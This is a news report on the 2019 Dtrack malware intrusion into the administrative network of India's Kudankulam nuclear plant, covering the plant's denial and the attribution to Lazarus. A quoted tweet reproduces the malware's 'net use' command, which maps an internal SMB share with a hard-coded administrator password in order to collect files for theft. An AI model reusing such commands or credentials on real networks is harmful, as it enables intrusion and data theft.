Various reports and rumors yesterday speculated that India’s Kudankulam Nuclear Power Plant (KNPP) was hit by a cyber attack. A cybersecurity expert who was involved in the detection of this hack, claims that the attack originated from foreign soil (probably North Korea).
Interesting potential DTRACK (CC @Mao_Ware )
Dumps the data mined output via manually mapped share over SMB to RFC1918 address with a statically encoded user/pass:
> net use \\10.38.1.35\C$ su.controller5kk /user:KKNPP\administrator
— く̱͕̘͚ず̡̭̠ (@a_tweeter_user) October 28, 2019
On 28th October, cybersecurity professional Pukhraj Singh announced that he was alerted by a “third party” who discovered the attack, and Singh in turn, had alerted the National Cyber Security Coordinator about the same.
KNPP responded to the report and shut down the rumors denying that sensitive systems were compromised and issued the following statement:
“KNPP and other Indian nuclear power plants are not connected to outside cyber network and internet. Any cyber-attack on the Nuclear Power Plant Control System is not possible.”
Singh has a history of working with government agencies in the past. After the statement was issued, he clarified that the attack was made on an administrative network and not the operational one.
“I think they’re confusing the domain controller with control network. I didn’t claim the latter… The administrative (not operational) network was certainly popped,” he said.
While the attack did not affect reactor controls, but it may have snooped upon the research and technical data. The attack was focused on the collection of technical information, and leveraged a Windows SMB network drive share with credentials hard-coded into the malware to round up the files to steal.
According to Kaspersky, the malware involved is Dtrack — which is believed to be the work of North Korea’s Lazarus threat group.
Meanwhile, KNPP, which is the largest nuclear facility in India, says that the plant is safe from cyberattacks because the control systems network is isolated from the plant’s administrative networks.
However, the officials have not yet addressed what data might have been stolen.